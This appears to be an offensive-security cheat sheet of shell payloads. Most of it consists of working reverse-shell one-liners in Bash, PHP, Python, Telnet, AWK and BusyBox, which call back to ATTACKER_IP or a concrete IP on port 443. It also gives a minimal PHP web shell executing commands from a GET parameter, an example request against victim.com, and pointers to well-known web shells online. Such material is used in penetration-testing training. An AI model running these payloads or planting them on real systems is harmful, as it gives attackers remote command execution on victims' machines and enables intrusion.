Shell Payloads
A Shell Payload can be a command or script that exposes the shell to an incoming connection in the case of a bind shell or a send connection in the case of a reverse shell.
Bash#
Normal Bash Reverse Shell#
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1 This reverse shell initiates an interactive bash shell that redirects input and output through a TCP connection to the attacker’s IP (ATTACKER_IP) on port 443. The >& operator combines both standard output and standard error.
Bash Read Line Reverse Shell#
exec 5<>/dev/tcp/ATTACKER_IP/443; cat <&5 | while read line; do $line 2>&5 >&5; done This reverse shell creates a new file descriptor (5 in this case) and connects to a TCP socket. It will read and execute commands from the socket, sending the output back through the same socket.
Bash With File Descriptor 196 Reverse Shell#
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/443; sh <&196 >&196 2>&196 This reverse shell uses a file descriptor (196 in this case) to establish a TCP connection. It allows the shell to read commands from the network and send output back through the same connection.
Bash With File Descriptor 5 Reverse Shell#
bash -i 5<> /dev/tcp/ATTACKER_IP/443 0<&5 1>&5 2>&5Similar to the first example, this command opens a shell (bash -i), but it uses file descriptor 5 for input and output, enabling an interactive session over the TCP connection.
PHP#
PHP Reverse Shell Using the exec Function#
php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");' This reverse shell creates a socket connection to the attacker’s IP on port 443 and uses the exec function to execute a shell, redirecting standard input and output.
PHP Reverse Shell Using the shell_exec Function#
php -r '$sock=fsockopen("ATTACKER_IP",443);shell_exec("sh <&3 >&3 2>&3");'Similar to the previous command, but uses the shell_exec function.
PHP Reverse Shell Using the system Function#
php -r '$sock=fsockopen("ATTACKER_IP",443);system("sh <&3 >&3 2>&3");' This reverse shell employs the system function, which executes the command and outputs the result to the browser.
PHP Reverse Shell Using the passthru Function#
php -r '$sock=fsockopen("ATTACKER_IP",443);passthru("sh <&3 >&3 2>&3");'The passthru function executes a command and sends raw output back to the browser. This is useful when working with binary data.
PHP Reverse Shell Using the popen Function#
php -r '$sock=fsockopen("ATTACKER_IP",443);popen("sh <&3 >&3 2>&3", "r");' This reverse shell uses popen to open a process file pointer, allowing the shell to be executed.
Python#
Please note, the following snippets below require using python -c to run, indicated by the placeholder PY-C
Python Reverse Shell by Exporting Environment Variables#
export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' This reverse shell sets the remote host and port as environment variables, creates a socket connection, and duplicates the socket file descriptor for standard input/output.
Python Reverse Shell Using the subprocess Module#
PY-C 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.99.209",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' This reverse shell uses the subprocess module to spawn a shell and set up a similar environment as the Python Reverse Shell by Exporting Environment Variables command.
Short Python Reverse Shell#
PY-C 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER_IP",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'This reverse shell creates a socket (s), connects to the attacker, and redirects standard input, output, and error to the socket using os.dup2().
Telnet#
TF=$(mktemp -u); mkfifo $TF && telnet ATTACKER_IP443 0<$TF | sh 1>$TFThis reverse shell creates a named pipe using mkfifo and connects to the attacker via Telnet on IP ATTACKER_IP and port 443.
AWK#
awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/nullThis reverse shell uses AWK’s built-in TCP capabilities to connect to ATTACKER_IP:443. It reads commands from the attacker and executes them. Then it sends the results back over the same TCP connection.
BusyBox#
busybox nc ATTACKER_IP 443 -e shThis BusyBox reverse shell uses Netcat (nc) to connect to the attacker at ATTACKER_IP:443. Once connected, it executes /bin/sh, exposing the command line to the attacker.
Web Shells#
A web shell is a script written in a language supported by a compromised web server that executes commands through the web server itself. A web shell is usually a file containing the code that executes commands and handles files. It can be hidden within a compromised web application or service, making it difficult to detect and very popular among attackers.
Web shells can be written in several languages supported by web servers, like PHP, ASP, JSP, and even simple CGI scripts.
Example PHP Web Shell#
Let’s look at an example PHP web shell to understand how this process works:
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>The above shell can be saved into a file with the PHP extension, like shell.php, and then uploaded into the web server by the attacker by exploiting vulnerabilities such as Unrestricted File Upload, File Inclusion, Command Injection, among others, or by gaining unauthorized access to it.
After the web shell is deployed in the server, it can be accessed through the URL where the web shell is hosted, in this example http://victim.com/uploads/shell.php ↗. As we observed from the code in shell.php, we need to provide a GET method and the value of the variable cmd, which should contain the command the attacker wants to execute. For example, if we want to execute the command whoami the request to the URL should be:
http://victim.com/uploads/shell.php?cmd=whoamiThe above will execute the command whoami and display the result in the web browser.
Existing Web Shells Available Online#
The power of supported languages by the web servers can result in web shells with lots of functionality and avoid detection at the same time. Let’s explore some of the most popular web shells that can be found online
- p0wny-shell ↗ - A minimalistic single-file PHP web shell that allows remote command execution.
- b374k shell ↗ - A more feature-rich PHP web shell with file management and command execution, among other functionalities.
- c99 shell ↗ - A well-known and robust PHP web shell with extensive functionality.
- You can find more web shells at: https://www.r57shell.net/index.php ↗.